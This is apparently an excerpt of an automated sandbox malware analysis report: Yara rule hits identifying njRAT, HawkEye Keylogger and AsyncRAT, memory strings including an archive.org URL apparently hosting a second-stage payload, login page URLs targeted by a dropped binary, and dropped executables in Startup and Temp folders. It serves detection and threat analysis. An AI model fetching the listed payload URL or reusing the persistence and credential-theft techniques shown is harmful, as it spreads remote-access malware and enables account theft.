Source: wscript.exe, 00000000.00000003.340835595.000001B863D52000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.369127141.000001B865B94000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.361151297.000001B863DE7000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373459438.000001B865C70000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.368780987.000001B865B73000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373627611.000001B865F9B000.00000004.00000001.sdmp String found in binary or memory: https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt
Source: wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt3u
Source: wscript.exe, 00000000.00000003.339656954.000001B863D52000.00000004.00000001.sdmp String found in binary or memory: https://ia601504.us.archive.org/25/iter
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp String found in binary or memory: https://ia601504.us.archive.org/3
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com
Source: tmpFB21.tmp.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: tmpFB21.tmp.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https:/
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown HTTPS traffic detected: 207.241.227.114:443 -> 192.168.2.6:49699 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected AsyncRAT
Source: Yara match File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Yara detected HawkEye Keylogger
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE
Contains functionality to log keystrokes (.Net Source)
Source: Tmp.exe.0.dr, kl.cs .Net Code: VKCodeToUnicode
Source: servieda.exe.1.dr, kl.cs .Net Code: VKCodeToUnicode
Source: 1.0.Tmp.exe.1d0000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 1.2.Tmp.exe.1d0000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, kl.cs .Net Code: VKCodeToUnicode
Source: 2.2.pgr.exe.80000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 2.0.pgr.exe.80000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, kl.cs .Net Code: VKCodeToUnicode
Source: 3.2.servieda.exe.a0000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 3.0.servieda.exe.a0000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA, 14_2_0040AC8A
Creates a DirectInput object (often for capturing keystrokes)
Source: tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Njrat
Source: Yara match File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
